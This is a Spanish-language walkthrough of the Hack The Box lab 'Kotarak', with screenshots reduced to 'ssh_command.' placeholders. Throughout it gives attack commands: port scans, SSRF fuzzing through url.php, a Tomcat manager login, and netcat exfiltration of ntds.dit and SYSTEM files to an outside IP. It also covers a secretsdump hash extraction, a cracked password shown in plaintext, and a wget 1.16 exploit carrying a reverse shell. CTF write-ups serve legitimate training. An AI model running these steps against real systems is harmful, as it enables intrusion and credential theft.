Kotarak

Kotarak

Aug 25, 2021
HTB Linux

nmap -A -p- -oA kotarak 10.129.1.117 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA kotarak 10.129.1.117

nmap -sU -O -p- -oA kotarak-udp 10.129.1.117

ssh_command.

nmap -sCV -p80,443 10.129.1.117 -oN targeted

ssh_command.

whatweb 10.129.1.117

ssh_command.

http://10.129.1.117:60000

ssh_command.

wfuzz -c -t 400 —hc=404 —hh=3 -z range, 1-65535 http://10.129.1.117:60000/url.php?path=http://localhost:FUZZ

ssh_command.

http://10.129.1.117:60000/url.php?path=http://localhost:888?doc=backup

ssh_command.

http://10.129.1.117:8080/manager/html

Ponemos las credenciales que encontramos en el grafico anterior.

ssh_command.

ssh_command.

ssh_command.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

(CTRL+ Z)

stty raw -echo; fg reset xterm export TERM=xterm export SHELL=bash

ssh_command.

find -name user.txt 2>/dev/null | xargs cat

ssh_command.

Vemos los archivos .dit y .bin

Transferimos archivos

nc 10.10.14.25 443 < 20170722._089134.bin

nc -lvnp 443 > ntds.bin

ssh_command.

nc 10.10.14.25 443 < 20170722._089134.dit

nc -lvnp 443 > ntds.dit

file *

ssh_command.

mv ntds.bin SYSTEM

mv ntds.dit ntds

ssh_command.

python3 /opt/impacket/example/secretsdump.py -ntds ntds -system SYSTEM LOCAL

ssh_command.

Vemos el hash de atanas

ssh_command.

cat hash | awk ‘{print $4}’ FS=”:” | xclip -sel clip

ssh_command.

Vamos a crackstation y vemos las credenciales

ssh_command.

su atanas

password: f16tomcat!

ssh_command.

ls -l /etc/authbind

ssh_command.

authbind nc -lvnp 80

ssh_command.

Vemos que la version de wget es 1.16

ssh_command.

Cambiamos la ip y hacemos un reverse shell en el script.

ssh_command.

authbind python -m pyftpdlib -p21 -w

ssh_command.

authbind python exploit.py

ssh_command.

ssh_command.

nc -lvnp 443